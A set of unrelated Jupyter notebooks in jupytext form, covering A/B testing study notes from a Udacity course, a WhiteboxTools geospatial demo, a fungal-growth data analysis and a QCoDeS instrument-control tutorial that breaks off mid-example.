# A/B testing is a general online method to test features, decide the control and experiment audiences, and determine which variant is better. It finds whether one change is significantly better between the control group and the experiment group. It is not very useful, however, for comparing two designs that are each already at their best. Amazon's personalized recommendations were improved with A/B testing, and a hundred-millisecond delay in page load, also testable with A/B testing, was found to decrease revenue by about 1%.
#
# A/B testing is tricky to measure, as we need a good metric to analyze. It can tell us about one change, but not about overall changes. That's why, when we have one big experiment, we usually run multiple A/B tests across multiple sub-experiments.
# ### Other techniques
#
# So if we can't use A/B testing, what other techniques can be used to test changes in our product? We can observe user logs and treat them as observational studies when forming hypotheses, or use randomized retrospective analysis of behavior. Retrospective analysis gives you small but deep qualitative data, while A/B testing gives you quantitative data.
#
# The quantitative-vs-qualitative difference also applies to online vs traditional experiments. In a traditional experiment you know each of the people in your group: not only their health status if you are testing a new medicine, for example, but also their habits, their occupation, their family, their hobbies. You know them deeply by interacting with them. In an online experiment, all of this is gone. You only know the time and possibly an IP address and user agent, but that's it. You can get millions of users in an online test, but you don't know them as deeply as a small qualitative group.
# ## History of A/B testing
#
# There is no official record of the origin of A/B testing, but it was long applied in agriculture, where farmers divide a field into sections, apply various techniques, and observe which works better for a given crop.
# 
#
# *Screenshot taken from [Udacity](https://www.udacity.com/course/viewer#!/c-ud257/l-4018018619/m-4004398683) 1:56*
# Take a web company, Udacity for example, that wants to apply a change like the one in the experiment shown above. Nearly every digital web company does some funnel analysis: the number of users at each step, from homepage visits down to the actual conversion, the final action we care about, whether that's creating an account or completing a purchase. The funnel describes how the number of users decreases as we move to deeper layers. The idea is that if we apply this change to the homepage, it should move more users one layer deeper, to 'Exploring the site'. If it doesn't give a significant increase, we don't want to launch it, and we absolutely don't want to launch it if the change decreases the number of users moving to the next layer. Ideally, increasing the number of users at one layer also increases the numbers at even deeper layers, up to the actual conversion.
# 
#
# *Screenshot taken from [Udacity](https://www.udacity.com/course/viewer#!/c-ud257/l-4018018619/m-4004398684) 2:19*
# After we have designed a research question, as in the previous paragraph, we want a test statistic that fits our experiment. One popular choice is CTR, click-through rate, which measures the number of clicks per user. But for our particular case, CTR is not the best choice; what we actually want is CTP, click-through probability. CTR doesn't count unique users, it counts clicks. Suppose we have two people, as described above: the first person never clicks, and the second clicks 5 times (perhaps because the page is lagging and they are rapidly clicking the button).
#
# CTR will give you
#
# clicks/person = 5/2 = 2.5
#
# CTP will give you
#
# atleastone/person = 0.5
#
# So in our case, CTP is the right choice, and we revise our hypothesis with CTP as the test statistic. When do we use CTR and when CTP? CTR usually measures visibility (of the button, in our example), while CTP measures impact; CTP avoids the problem of users clicking more than once. CTP can be obtained by working with engineers to capture, on every page view, whether there was at least one click.
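# The two-person example above can be checked in a few lines of plain Python (a sketch; the click counts are the hypothetical ones from the example):

```python
# Hypothetical click log from the example: user 1 never clicks, user 2 clicks 5 times.
clicks = {'user_1': 0, 'user_2': 5}

n_users = len(clicks)
total_clicks = sum(clicks.values())

ctr = total_clicks / n_users                               # clicks per user
ctp = sum(1 for c in clicks.values() if c >= 1) / n_users  # users with >= 1 click

print(ctr)  # 2.5
print(ctp)  # 0.5
```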
# 
#
# *Screenshot taken from [Udacity](https://www.udacity.com/course/viewer#!/c-ud257/l-4018018619/e-4004398686/m-4004398688) 0:22*
# Considering the large number of samples (1000), an observed value of 150 is even further away in standard-error terms.
# We have only two possible outcomes for click-through probability, and the metric of interest is a probability. This means we want to use the binomial distribution, where success is a click and failure is no click.
#
# If you want to refresh your binomial distribution, check out my other [blog](http://napitupulu-jon.appspot.com/posts/distribution-coursera-statistics-ud827.html#Binomial-Distribution).
# 
#
# *Screenshot taken from [Udacity](https://www.udacity.com/course/viewer#!/c-ud257/l-4018018619/e-4004398690/m-4004398692) 1:32*
# 1. dependent
# 2. independent, mutually exclusive outcomes
# 3. same user, same search result
# 4. could be binomial: one event is one user completing one course, and a user can't finish the same course twice
# 5. one user can make multiple purchases
# Since there are two possible outcomes, we might expect two peaks in the distribution. When we talk about the probability, by the law of large numbers the probability becomes the proportion: p for success (click) and (1 - p) for failure (no click). For the binomial to be approximated by a normal distribution, the sample should contain at least 5 expected clicks and 5 expected non-clicks.
# If it follows a normal distribution, then ME = 1.96 × SE (at 95% confidence).
#
# If you need to refresh your statistics of Confidence Interval for proportion, check out my other [blog](http://napitupulu-jon.appspot.com/posts/ht-ci-categorical-coursera-statistics.html#Confidence-Interval).
# So for example, if the sample size is 2000 and the number of clicks is 300, a 99% confidence interval gives us:
# %load_ext rpy2.ipython
# + language="R"
# c = 300
# n = 2000
# pe = 300/2000
# CL = 0.99
# SE = sqrt(pe*(1-pe)/n)
# z_star = round(qnorm((1-CL)/2,lower.tail=F),digits=2)
# ME = z_star * SE
#
# c(pe-ME, pe+ME)
# -
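# The same interval can be computed in plain Python with the standard library (a sketch mirroring the R cell above):

```python
from math import sqrt
from statistics import NormalDist

c, n, CL = 300, 2000, 0.99
pe = c / n                                                 # point estimate: 0.15
SE = sqrt(pe * (1 - pe) / n)                               # standard error
z_star = round(NormalDist().inv_cdf(1 - (1 - CL) / 2), 2)  # ~2.58 for 99% CL
ME = z_star * SE                                           # margin of error
print((pe - ME, pe + ME))                                  # roughly (0.129, 0.171)
```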
# Now we have our CTP within a 99% CI (meaning that 99% of such intervals would capture the population proportion). Remember this is computed before we begin the experiment and split into two groups. The idea is that once we apply the change to the experiment group, the observed difference has to be significant, i.e., outside the range of the CI. If we're looking for a positive change (an increase in CTP), it should be beyond the upper boundary of the CI.
# ### Comparing two samples
#
# Comparing two samples (groups) requires hypothesis testing. The (pooled) difference should be outside the CI we discussed earlier.
#
# Again, if you want to refresh, or feel rusty about, estimating the difference between two proportions in hypothesis testing, feel free to check my [other blog.](http://napitupulu-jon.appspot.com/posts/ht-ci-categorical-coursera-statistics.html)
# ### Practical, Substantive, Significance.
#
# When we talk about differences, statistics distinguishes practical significance from statistical significance. Statistical significance is what we calculate (our p-value), while practical significance is the fixed level we set in advance; in other words, our target level.
#
# Why does it matter? Because, as always, gathering data is expensive and requires effort, time, and investment, and we don't want to waste such resources. You can see further explanation in my other [blog](http://napitupulu-jon.appspot.com/posts/decision-coursera-statistiscs.html#Statistical-vs.-practical-significance). For business practice and investment decisions, practical significance is what matters.
#
# So what decides the level of significance? For a company like Google, a 2% difference is quite large.
# ### Size vs Power Trade Off
# 
#
# *Screenshot taken from [Udacity](https://www.udacity.com/course/viewer#!/c-ud257/l-4018018619/m-4004398705) 2:40*
# When designing an experiment, we need to know how many pageviews (how much data) we need to detect statistical significance, i.e., to reach the desired statistical power.
#
# In hypothesis testing, we can't blindly reject the null hypothesis when the observed statistic falls only slightly short of practical significance.
#
# There is a trade-off here. Increasing the size of the data costs some investment, but it also makes the test more sensitive to changes, and if the change does make a positive difference, it will be profit for the company. This sensitivity is what we call statistical power: (1 - β) is the probability of correctly rejecting the null hypothesis, which in this case we set to 80%. (1 - β) depends on the sample size; a larger sample means the distance between the point estimate and the null value is larger in standard-error terms. β is the probability of a type 2 error.
# We set α at our practical-significance level, and β controls the failure mode we actually care about: we want the power (1 - β) at the practical-significance boundary to be 80%. If we have a small sample, the type 2 error will be high, so high that the observed difference stays within the CI and we fail to reject the null hypothesis. A larger sample keeps α (as practical significance) the same but raises the sensitivity: the standard error shrinks and the CI tightens, enough that β falls outside the CI range.
# If you want to see further about Type 1 error, Type 2 Error, Beta, and power, please check this [blog](http://napitupulu-jon.appspot.com/posts/decision-coursera-statistiscs.html#Decision-Errors)
# ### Calculating number of page views needed
#
# How many pages will we need in each group?
#
# If we look at our problem earlier, Suppose we have:
#
# ```
# N = 1000
# x = 100
# alpha = 0.05
# Beta = 0.3
# dmin = 2% (practical significance level)
# ```
#
# > dmin = minimum difference that we actually care about, in business-practice terms
# 
#
# *Screenshot taken from [Udacity](https://www.udacity.com/course/viewer#!/c-ud257/l-4018018619/m-4004398705) 2:40*
# Remember: a smaller sample size means a higher standard error. If we increase the sample size, by the law of large numbers the observed proportion approaches the true proportion and moves away from extreme values.
#
# If we increase dmin, we are applying a looser significance requirement: we accept a larger minimum difference, so a 20% dmin tolerates more error than a 5% dmin, and more tolerated error allows a smaller sample size.
#
# Increasing the confidence level increases the required sample size. A 95% level gives a narrower interval than 99%; with 99%, the difference has to be even further away to fall outside the boundary, and making the distance between null value and point estimate that distinguishable requires a larger sample.
#
# Higher sensitivity (power), as we discussed earlier, narrows the error distribution and hence requires a larger sample size.
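# The size/power trade-off can be made concrete with a standard sample-size formula for comparing two proportions (a sketch: the 10% baseline rate and 2% dmin are illustrative, and this normal-approximation formula need not match Udacity's calculator exactly):

```python
from math import sqrt, ceil
from statistics import NormalDist

def sample_size_two_proportions(p1, dmin, alpha=0.05, power=0.8):
    """Approximate per-group n to detect p2 = p1 + dmin with a two-sided z-test."""
    p2 = p1 + dmin
    z_a = NormalDist().inv_cdf(1 - alpha / 2)  # critical value for alpha
    z_b = NormalDist().inv_cdf(power)          # critical value for power (1 - beta)
    p_bar = (p1 + p2) / 2
    num = (z_a * sqrt(2 * p_bar * (1 - p_bar))
           + z_b * sqrt(p1 * (1 - p1) + p2 * (1 - p2))) ** 2
    return ceil(num / dmin ** 2)

# Baseline CTP of 10%, practical significance dmin = 2 percentage points:
n_needed = sample_size_two_proportions(0.10, 0.02)
print(n_needed)  # on the order of a few thousand pageviews per group
```

# Tightening alpha, raising the power, or shrinking dmin all increase the required number of pageviews, matching the trade-offs discussed above.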
# ### Analyze
# 
#
# *Screenshot taken from [Udacity](https://www.udacity.com/course/viewer#!/c-ud257/l-4018018619/e-4004398712/m-4004398714) 0:55*
# Suppose we have proportions of users based on the number of clicks and the number of unique users, with group sizes not exactly equal because of random assignment.
# There are two factors to consider when deciding the result of your A/B test, that is, whether to launch the change or not: the difference must be statistically significantly different from zero, and the change must be greater than your practical-significance boundary.
# ### CI Breakdown
# 
#
# *Screenshot taken from [Udacity](https://www.udacity.com/course/viewer#!/c-ud257/l-4018018619/e-4004398715/m-4004398717) 02:05*
# There are various cases for where our CI can sit relative to the practical-significance boundary, so it's best to get some intuition. If your confidence interval overlaps the practical-significance boundary, it may be better to run an additional test. The first case is where we absolutely launch, as in the previous example, because the whole interval is beyond the practical-significance boundary.
#
# The second and third don't even touch the boundary; because they stay within it, the change is not significant and we don't launch.
#
# The next three intervals are trickier: they all touch the boundary. The longest CI touches both the lower and upper boundaries; since part of it lies beyond the lower boundary we definitely wouldn't want to launch, yet the other side reaches past the upper boundary, so we want to perform an additional test. In the last two, the point estimate is centered beyond the upper boundary, but the lower end of the interval is still within practical significance, so we again proceed to an additional test.
#
# Running additional tests for the last three CIs is needed because repeated testing gives us confidence, but it requires more samples and time, an investment that the business side of your company may not want to make. It's best to discuss it with them, along with the additional risk if they insist on launching the change. They can then decide with our recommendation in hand, alongside business strategy.
# > ***Disclaimer***:
#
# > *This blog is originally created as an online personal notebook, and the materials are not mine. Take the material as is. If you like this blog and/or you think any of the material is a bit misleading and want to learn more, please visit the original sources at the reference link below.*
#
# > ***References***:
# > * <NAME> and <NAME>. [Udacity](https://www.udacity.com/course/ab-testing--ud257)
|
machine_learning/lecture/week_1/ii_linear_regression_with_one_variable_week_1/.ipynb_checkpoints/abtesting-overview-udacity-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# **Using WhiteboxTools with ipyleaflet**
#
# - WhiteboxTools: https://github.com/jblindsay/whitebox-tools
# - WhiteboxTools frontends:
# - All in one: https://github.com/giswqs/whitebox-frontends
# - Python: https://github.com/giswqs/whitebox
# - R: https://github.com/giswqs/whiteboxR
# - Jupyter: https://github.com/giswqs/whiteboxgui
# - ArcGIS: https://github.com/giswqs/WhiteboxTools-ArcGIS
# - QGIS: https://jblindsay.github.io/wbt_book/qgis_plugin.html
# ## whiteboxgui
#
# - GitHub: https://github.com/giswqs/whiteboxgui
# - [Run whiteboxgui with Colab](https://colab.research.google.com/github/giswqs/whiteboxgui/blob/master/examples/examples.ipynb)
import whiteboxgui
whiteboxgui.show()
whiteboxgui.show(tree=True)
# ## whitebox
#
# - GitHub: https://github.com/giswqs/whitebox
# - [Run whitebox with Colab](https://colab.research.google.com/github/giswqs/whitebox-python/blob/master/examples/whitebox.ipynb)
import os
import pkg_resources
import whitebox
wbt = whitebox.WhiteboxTools()
print(wbt.version())
print(wbt.help())
data_dir = os.path.dirname(pkg_resources.resource_filename("whitebox", 'testdata/'))
print(data_dir)
in_dem = os.path.join(data_dir, "DEM.tif")
work_dir = os.path.expanduser('~/Downloads')
if not os.path.exists(work_dir):
os.makedirs(work_dir)
wbt.set_working_dir(work_dir)
wbt.verbose = True
wbt.feature_preserving_smoothing(in_dem, "smoothed.tif", filter=9)
wbt.breach_depressions("smoothed.tif", "breached.tif")
wbt.d_inf_flow_accumulation("breached.tif", "flow_accum.tif")
# ## Using whitebox with ipyleaflet
import geodemo
import whiteboxgui.whiteboxgui as wbt
from ipyleaflet import WidgetControl
m = geodemo.Map()
m
# +
tools_dict = wbt.get_wbt_dict()
wbt_toolbox = wbt.build_toolbox(
tools_dict, max_width="800px", max_height="500px"
)
wbt_control = WidgetControl(
widget=wbt_toolbox, position="bottomright"
)
m.add_control(wbt_control)
|
examples/whitebox.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# %matplotlib widget
import os
import sys
sys.path.insert(0, os.getenv('HOME')+'/pycode/MscThesis/')
import pandas as pd
from amftrack.util import get_dates_datetime, get_dirname, get_plate_number, get_postion_number
import ast
from amftrack.plotutil import plot_t_tp1
from scipy import sparse
from datetime import datetime
from amftrack.pipeline.functions.node_id import orient
import pickle
import scipy.io as sio
from pymatreader import read_mat
from matplotlib import colors
import cv2
import imageio
import matplotlib.pyplot as plt
import numpy as np
from skimage.filters import frangi
from skimage import filters
from random import choice
import scipy.sparse
import os
from amftrack.pipeline.functions.extract_graph import from_sparse_to_graph, generate_nx_graph, sparse_to_doc
from skimage.feature import hessian_matrix_det
from amftrack.pipeline.functions.experiment_class_surf import Experiment
from amftrack.pipeline.paths.directory import run_parallel, find_state, directory_scratch, directory_project, path_code
from amftrack.notebooks.analysis.data_info import *
import matplotlib.patches as mpatches
from statsmodels.stats import weightstats as stests
from mpl_toolkits.mplot3d import Axes3D
from scipy.ndimage import gaussian_filter
from scipy.ndimage import uniform_filter1d
from scipy import stats
import statsmodels.api as sm
from sklearn.neighbors import KernelDensity
# -
window=800
infos = pickle.load(open(f'{path_code}/MscThesis/Results/straight_bait_{window}.pick', "rb"))
set(infos['treatment'].values)
def get_angle(xa,ya,xb,yb):
dot_product = (xa*xb+ya*yb)/np.sqrt((xa**2+ya**2)*(xb**2+yb**2))
angle = (np.arccos(dot_product) / (2 * np.pi) * 360)*(1-2*((ya * xb - yb * xa) >= 0))
return(angle)
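# A quick sanity check of the sign convention in get_angle (restated here so the sketch runs standalone): rotations from vector a to vector b come out positive when counterclockwise.

```python
import numpy as np

def get_angle(xa, ya, xb, yb):
    # Signed angle in degrees between vectors a=(xa,ya) and b=(xb,yb).
    dot_product = (xa*xb + ya*yb) / np.sqrt((xa**2 + ya**2) * (xb**2 + yb**2))
    angle = (np.arccos(dot_product) / (2 * np.pi) * 360) * (1 - 2*((ya*xb - yb*xa) >= 0))
    return angle

print(get_angle(1, 0, 0, 1))   # 90.0: (0,1) is 90 deg counterclockwise from (1,0)
print(get_angle(1, 0, 0, -1))  # -90.0: clockwise rotations are negative
print(get_angle(1, 0, 1, 1))   # 45.0
```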
def getKernelDensityEstimation(values, x, bandwidth = 0.2, kernel = 'gaussian'):
model = KernelDensity(kernel = kernel, bandwidth=bandwidth)
model.fit(values[:, np.newaxis])
log_density = model.score_samples(x[:, np.newaxis])
return np.exp(log_density)
def bestBandwidth(data, minBandwidth = 1, maxBandwidth = 20, nb_bandwidths = 30, cv = 30):
"""
Run a cross validation grid search to identify the optimal bandwidth for the kernel density
estimation.
"""
from sklearn.model_selection import GridSearchCV
model = GridSearchCV(KernelDensity(),
{'bandwidth': np.linspace(minBandwidth, maxBandwidth, nb_bandwidths)}, cv=cv)
model.fit(data[:, None])
return model.best_params_['bandwidth']
infos.columns
infos['abs_angle_to_P']=np.abs(infos['angle_to_P'])
infos['abs_curvature']=np.abs(infos['curvature'])
infos['curvature_scaled']=infos['curvature']*np.sqrt(infos['growth'])
infos['abs_curvature_sq']=np.abs(infos['curvature'])*np.sqrt(infos['growth'])
infos['signed_straight']=(1-infos['straightness'])*(1-2*(infos['angle']<0))
infos['inv_dens']=1/infos['density']
infos['side_cross']=infos.apply (lambda row: comments[row['plate']] if row['plate'] in comments.keys() else 'None', axis=1)
infos['x']=infos['x'].astype(float)
infos['vx']=infos['vx'].astype(float)
infos['y']=infos['y'].astype(float)
infos['vy']=infos['vy'].astype(float)
infos['xinit']=infos['xinit'].astype(float)
infos['yinit']=infos['yinit'].astype(float)
blur = 20
infos['v'] = np.sqrt((infos['vx']**2+infos['vy']**2).astype(float))
infos['gd'] = np.sqrt((infos[f'grad_density_x{blur}']**2+infos[f'grad_density_y{blur}']**2).astype(float))
infos['spvgd']=(infos['vx']*infos[f'grad_density_x{blur}']+infos['vy']*infos[f'grad_density_y{blur}'])/(infos['v']*infos['gd'])
infos['angle_vgd']=get_angle(-infos[f'grad_density_x{blur}'],-infos[f'grad_density_y{blur}'],infos['vx'],infos['vy'])
infos['angle_vgd2']=get_angle(-infos[f'grad_density_x{blur}'],-infos[f'grad_density_y{blur}'],infos['xinit'],infos['yinit'])
infos['angle_Pgd']=infos['angle_vgd']+infos['angle_to_P']
infos['angle_Ngd']=infos['angle_vgd']+infos['angle_to_N']
# infos['residual']=infos['speed']-f(infos['spvgd'])
infos.to_csv(f'{path_code}/MscThesis/Results/growth_pattern.csv')
# + jupyter={"outputs_hidden": true}
infos
# -
corrected = infos.loc[(infos["straightness"] <= 1)& (infos["speed"] >=25)& (infos["speed"] <400)&(infos["straightness"] > 0.95)&(infos["density"]>0)]
baits = corrected.loc[corrected['treatment']=='baits']
no_baits = corrected.loc[corrected['treatment']=='25']
no_baits_new = corrected.loc[corrected['treatment']=='25*']
# +
plt.close('all')
fig = plt.figure()
bins = np.linspace(0, 400, 50)
ax = fig.add_subplot(111)
# ax.hist(corrected.loc[corrected['treatment'] == '25']['speed'],bins,alpha=0.3,label='Dummy baits (homogeneous soluble)',density=True)
# ax.hist(corrected.loc[corrected['treatment'] == 'baits']['speed'],bins,alpha=0.3,label='P&N baits (heterogeneous rock form)',density=True)
# ax.hist(corrected.loc[corrected['treatment'] == '25*']['speed'],bins,alpha=0.3,label='No baits (homogeneous soluble)',density=True)
# ax.hist(corrected.loc[corrected['plate'] == 94]['speed'],bins,alpha=0.3,label='No baits (homogeneous soluble)',density=True)
# ax.hist(corrected.loc[corrected['plate'] == 69]['speed'],bins,alpha=0.3,label='No baits (homogeneous soluble)',density=True)
# ax.hist(corrected.loc[corrected['plate'] == 102]['speed'],bins,alpha=0.3,label='No baits (homogeneous soluble)',density=True)
# x = np.linspace(-6,6,100)
x = np.linspace(0,400,100)
# bandwidth = 5
data = corrected.loc[corrected['plate'] == 69]['speed']
# data = corrected.loc[corrected['treatment'] == 'baits']['speed']
cv_bandwidth = bestBandwidth(data)
kde = getKernelDensityEstimation(data, x, bandwidth=cv_bandwidth)
ax.hist(data,30,density=True)
plt.plot(x, kde, alpha = 0.8, label = f'bandwidth = {round(cv_bandwidth, 2)}')
ax.set_xlabel(r'speed ($\mu m.h^{-1} $)')
plt.legend(loc='upper right')
ax.set_ylabel(r'density')
# -
from unidip import UniDip
import unidip.dip as dip
data = np.msort(data)
print(dip.diptst(data))
intervals = UniDip(data).run()
print(intervals)
# +
from unidip import UniDip
# create bi-modal distribution
dat = np.concatenate([np.random.randn(200)-3, np.random.randn(200)+3])
# sort data so returned indices are meaningful
dat = np.msort(dat)
# get start and stop indices of peaks
intervals = UniDip(dat).run()
# -
right_crossing = [plate for plate in comments.keys() if comments[plate]=='right']
non_turning = [plate for plate in set(corrected['plate'].values) if np.mean(corrected.loc[corrected['plate']==plate]['signed_straight'])<0.005]
# +
plt.close('all')
plate_select = corrected.loc[corrected['plate']==94]
# plate_select = corrected.loc[corrected ['plate'].isin(right_crossing)]
# straight_going = corrected.loc[corrected['plate'].isin(non_turning)]
abcisse = 'density'
ordinate = 'speed'
tab = plate_select
baits_sort = tab.sort_values(abcisse)
N=800
moving_av = baits_sort.rolling(N,min_periods=N//2).mean()
moving_std = baits_sort.rolling(N,min_periods=N//2).std()
fig=plt.figure(figsize=(8,8))
ax = fig.add_subplot(111)
ax.set_xlabel('angle between growth direction and gradient of density (°)')
ax.set_ylabel('speed ($\mu m .h^{-1}$)')
ax.set_xlim(0,6)
# ax.set_ylim(-0.5,0.5)
# ax.set_xlim(-190,190)
# slope, intercept, r_value, p_value, std_err = stats.linregress(densities_sort,np.abs(curvatures_sort))
for plate in set(tab['plate'].values):
select = tab.loc[tab['plate']==plate]
ax.scatter(select[abcisse],select[ordinate],label=plate,alpha=0.3)
ax.plot(moving_av[abcisse],moving_av[ordinate],color='green',label = 'moving average')
ax.plot(moving_av[abcisse],(moving_av[ordinate]+moving_std[ordinate]/np.sqrt(N)),color='red',label = 'std')
ax.plot(moving_av[abcisse],(moving_av[ordinate]-moving_std[ordinate]/np.sqrt(N)),color='red',label = 'std')
# ax.legend()
# -
from scipy.interpolate import interp1d
x = moving_av["spvgd"]
y = moving_av["speed"]
f = interp1d(x, y,copy=True,fill_value=(250,160),bounds_error=False)
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(9, 4))
bplot1 = corrected.boxplot(column = ['angle_vgd2'],by="treatment",figsize =(9,8),ax =ax,patch_artist=True, showfliers=False, notch=True,showmeans = True)
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(9, 4))
bplot1 = corrected.boxplot(column = ['signed_straight'],by="plate",figsize =(9,8),ax =ax,patch_artist=True, showfliers=False, notch=True,showmeans = True)
# + jupyter={"outputs_hidden": true}
tab
# -
np.mean(tab['angle_vgd2']),np.std(tab['angle_vgd2'])/np.sqrt(len(tab))
# +
plt.close('all')
plate_select = corrected.loc[corrected['plate']==436]
abcisse = 'angle_to_P'
ordinate = 'residual'
tab = baits
baits_sort = tab.sort_values(abcisse)
N=600
moving_av = baits_sort.rolling(N,min_periods=N//2).mean()
moving_std = baits_sort.rolling(N,min_periods=N//2).std()
fig=plt.figure(figsize=(8,8))
ax = fig.add_subplot(111)
ax.set_xlabel('angle to P (°)')  # x-axis is the 'angle_to_P' column selected above
ax.set_ylabel(r'residual ($\mu m. h^{-1}$)')
# ax.set_xlim(-0.001,0.001)
# ax.set_ylim(-150,150)
# ax.set_xlim(-190,190)
# slope, intercept, r_value, p_value, std_err = stats.linregress(densities_sort,np.abs(curvatures_sort))
for plate in set(tab['plate'].values):
select = tab.loc[tab['plate']==plate]
ax.scatter(select[abcisse],select[ordinate],label=plate,alpha=0.3)
ax.plot(moving_av[abcisse],moving_av[ordinate],color='green',label = 'moving average')
ax.plot(moving_av[abcisse],(moving_av[ordinate]+moving_std[ordinate]/np.sqrt(N)),color='red',label = 'std')
ax.plot(moving_av[abcisse],(moving_av[ordinate]-moving_std[ordinate]/np.sqrt(N)),color='red',label = 'std')
# +
def get_density_map(plate,t,compress,blur,x,y,fz):
densities=np.zeros((30000//compress,60000//compress),dtype=float)  # np.float is removed in NumPy >= 1.24
select = corrected.loc[(corrected['plate']==plate) & (corrected['t']==t)]
for index,row in select.iterrows():
xx = int(row[x])//compress
yy = int(row[y])//compress
densities[xx,yy]+=fz(row)
density_filtered = gaussian_filter(densities,blur)
return(density_filtered)
# -
ts = set(corrected.loc[(corrected['plate']==419)]['t'])
ts = list(ts)
ts.sort()
# +
compress = 100
blur = 20
densities=np.zeros((30000//compress,60000//compress),dtype=float)  # np.float is removed in NumPy >= 1.24
count=np.zeros((30000//compress,60000//compress),dtype=float)
select = corrected
for index,row in select.iterrows():
xx = int(row['x'])//compress
yy = int(row['y'])//compress
densities[xx,yy]+=row['angle_vgd']
count[xx,yy]+=1
density_filtered = gaussian_filter(densities/(count+(count==0).astype(float)),blur)
# -
densities = [get_density_map(419,t,100,5,'x','y',lambda row : row['speed']) for t in ts]
plt.close('all')
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(9, 4))
ax.imshow(density_filtered)
imageio.mimsave('movie.gif', densities, duration=1)
|
amftrack/notebooks/analysis/grad_density.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # QCoDeS tutorial
# Basic overview of QCoDeS
#
# ## Table of Contents <a class="anchor" id="toc"></a>
# * [Workflow](#workflow)
# * [Basic instrument interaction](#inst_io)
# * [Measuring](#measurement)
# * [The loop: 1D example](#loop_1D)
# * [The loop: 2D example](#loop_2D)
#
# ## Typical QCoDeS workflow <a class="anchor" id="workflow"></a>
# (back to [ToC](#toc))
#
# 1. Start up an interactive python session (e.g. using jupyter)
# 2. import desired modules
# 3. instantiate required instruments
# 4. experiment!
# ### Importing
# +
# usually, one imports QCoDeS and some instruments
import qcodes as qc
# In this tutorial, we import the dummy instrument
from qcodes.tests.instrument_mocks import DummyInstrument
# real instruments are imported in a similar way, e.g.
# from qcodes.instrument_drivers.Keysight.Keysight_33500B import Keysight_33500B
# -
# ### Instantiation of instruments
# +
# It is not enough to import the instruments; they must also be instantiated
# Note that this can only be done once. If you try to re-instantiate an existing instrument, QCoDeS will
# complain that 'Another instrument has the name'.
# In this tutorial, we consider a simple situation: a single DAC outputting voltages to a digital multimeter (DMM)
dac = DummyInstrument(name="dac", gates=['ch1', 'ch2']) # The DAC voltage source
dmm = DummyInstrument(name="dmm", gates=['voltage']) # The DMM voltage reader
# the default dummy instrument always returns a constant value; in the following line we make it random
# just for the looks 💅
import random
dmm.voltage.get = lambda: random.randint(0, 100)
# Finally, the instruments should be bound to a Station. Only instruments bound to the Station get recorded in the
# measurement metadata, so your metadata is blind to any instrument not in the Station.
station = qc.Station(dac, dmm)
# +
# For the tutorial, we add a parameter that loudly prints what it is being set to
# (It is used below)
chX = 0
def myget():
return chX
def myset(x):
global chX
chX = x
print('Setting to {}'.format(x))
return None
dac.add_parameter('verbose_channel',
label='Verbose Channel',
unit='V',
get_cmd=myget,
set_cmd=myset)
# -
# ### The location provider can be set globally
loc_provider = qc.data.location.FormatLocation(fmt='data/{date}/#{counter}_{name}_{time}')
qc.data.data_set.DataSet.location_provider=loc_provider
# We are now ready to play with the instruments!
# ## Basic instrument interaction <a class="anchor" id="inst_io"></a>
# (back to [ToC](#toc))
#
# The interaction with instruments mainly consists of `setting` and `getting` the instruments' `parameters`. A parameter can be anything from the frequency of a signal generator, to the output impedance of an AWG, to the traces from a lock-in amplifier. For didactic reasons, this tutorial only considers scalar parameters.
# The voltages output by the dac can be set like so
dac.ch1.set(8)
# Now the output is 8 V. We can read this value back
dac.ch1.get()
# Setting IMMEDIATELY changes a value. For voltages, that is sometimes undesired. The value can instead be ramped by stepping and waiting.
# +
dac.verbose_channel.set(0)
dac.verbose_channel.set(9) # immediate voltage jump of 9 Volts (!)
# first set a step size
dac.verbose_channel.step = 0.1
# and a wait time
dac.verbose_channel.inter_delay = 0.01 # in seconds
# now a "staircase ramp" is performed by setting
dac.verbose_channel.set(5)
# after such a ramp, it is a good idea to reset the step and delay
dac.verbose_channel.step = 0
# and a wait time
dac.verbose_channel.inter_delay = 0
# -
# <span style="color:blue">**NOTE**</span>: that is ramp is blocking and has a low resolution since each `set` on a real instrument has a latency on the order of ms. Some instrument drivers support native-resolution asynchronous ramping. Always refer to your instrument driver if you need high performance of an instrument.
# ## Measuring <a class="anchor" id="measurement"></a>
# (back to [ToC](#toc))
#
# ### 1D Loop example
#
# #### Defining the `Loop` and actions
#
# Before you run a measurement loop you do two things:
# 1. You describe what parameter(s) to vary and how. This is the creation of a `Loop` object: `loop = Loop(sweep_values, ...)`
# 2. You describe what to do at each step in the loop. This is `loop.each(*actions)`
# - measurements (any object with a `.get` method will be interpreted as a measurement)
# - `Task`: some callable (which can have arguments with it) to be executed each time through the loop. Does not generate data.
# - `Wait`: a specialized `Task` just to wait a certain time.
# - `BreakIf`: some condition that, if it returns truthy, breaks (this level of) the loop
# +
# For instance, sweep a dac voltage and record with the dmm
loop = qc.Loop(dac.ch1.sweep(0, 20, 0.1), delay=0.001).each(dmm.voltage)
data = loop.get_data_set(name='testsweep')
# -
plot_1d = qc.QtPlot() # create a plot
plot_1d.add(data.dmm_voltage) # add a graph to the plot
_ = loop.with_bg_task(plot_1d.update, plot_1d.save).run() # run the loop
# The plot may be recalled easily
plot_1d
# #### Output of the loop
#
# * A loop returns a dataset.
# * The representation of the dataset shows what arrays it contains and where it is saved.
# * The dataset initially starts out empty (filled with NaNs) and gets filled while the Loop is executed.
# Once the measurement is done, take a look at the file in finder/explorer (the dataset.location should give you the relative path).
# Note also the snapshot that captures the settings of all instruments at the start of the Loop.
# This metadata is also accessible from the dataset and captures a snapshot of each instrument listed in the station.
dac.snapshot()
# There is also a more human-readable version of the essential information.
dac.print_readable_snapshot()
# ## Loading data
# The dataset knows its own location, which we may use to load data.
# +
location = data.location
loaded_data = qc.load_data(location)
plot = qc.MatPlot(loaded_data.dmm_voltage)
# -
#
# ## Example: multiple 2D measurements with live plotting
# +
# Loops can be nested, so that a new sweep runs for each point in the outer loop
